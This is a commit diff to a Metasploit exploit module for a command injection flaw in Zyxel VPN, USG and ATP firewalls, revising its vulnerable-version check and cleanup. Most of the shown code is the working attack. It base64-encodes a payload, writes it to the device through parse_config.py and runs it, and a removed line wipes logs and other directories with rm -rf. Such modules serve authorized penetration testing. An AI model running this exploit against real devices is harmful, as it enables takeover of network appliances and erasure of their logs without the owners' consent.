Fixed check method, responded to comments

jheysel-r7 · jheysel-r7 · commit 9955724f0a7d · 2024-05-28T15:54:28.000-04:00
diff --git a/modules/exploits/linux/http/zyxel_parse_config_rce.rb b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -8,15 +8,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Zyxel parse_config.py Command Injection',
         'Description' => %q{
-          This module exploits vulnerabilities in multiple Zyxel Products including VPN and USG devices (hopefully,
-          this is still in draft at the time of writing). The affected firmware version is 5.21 thru to 5.36.
+          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.
+          The affected firmware versions depend on the device module, see this module's documentation for more details.
         },
         'Author' => [
           'SSD Secure Disclosure technical team', # discovery
@@ -38,7 +39,7 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
-          'Reliability' => [ REPEATABLE_SESSION, ]
+          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot
         }
       )
     )
@@ -57,12 +58,25 @@ def check
     })
     return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?
 
-    if res.code == 200 && res.body =~ /ZLDCONFIG_CLOUD_HELP_VERSION=(\w+)/
-      return CheckCode::Appears("Detected #{Regexp.last_match(1)}.") if Rex::Version.new(Regexp.last_match(1)) < Rex::Version.new('5.36')
-
-      return CheckCode::Safe
+    if res.code == 200
+      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)
+      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)
+
+      if product_match && version_match
+        product = product_match[1]
+        version = version_match[1]
+
+        if (product.starts_with?('USG') && product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('USG') && !product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
+           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))
+          return CheckCode::Appears("Product: #{product}, Version: #{version}")
+        else
+          return CheckCode::Safe("Product: #{product}, Version: #{version}")
+        end
+      end
     end
-    CheckCode::Unknown('Version info was not found.')
+    CheckCode::Unknown('Version and product info were unable to be determined.')
   end
 
   def exploit
@@ -74,7 +88,7 @@ def exploit
     command = payload.encoded
     command += <<~CMD
       2>/var/log/ztplog 1>/var/log/ztplog
-      (sleep 10 && /bin/rm -rf #{payload_filepath} /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
+      (sleep 10 && /bin/rm -rf #{payload_filepath}) &
     CMD
     command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"
 
@@ -91,7 +105,7 @@ def exploit
       'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
       'data' => data.to_s
     })
-    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
+    fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
     register_files_for_cleanup(payload_filepath)
     print_good('File write was successful.')
 
@@ -111,18 +125,6 @@ def exploit
       'data' => data.to_s
     })
 
-    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
-
-    # Unecessary if running a fetch payload though adding for testing
-    cmd_ouput_res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
-    })
-
-    output = cmd_ouput_res.body.split("</head>\n<body>")[1]
-    output = output.split("</body>\n</html>")[0]
-    output = output.gsub("\n\n<br>", '')
-    output = output.gsub("[IPC]IPC result: 1\n", '')
-    print_good("Command output: #{output}")
+    fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
   end
 end
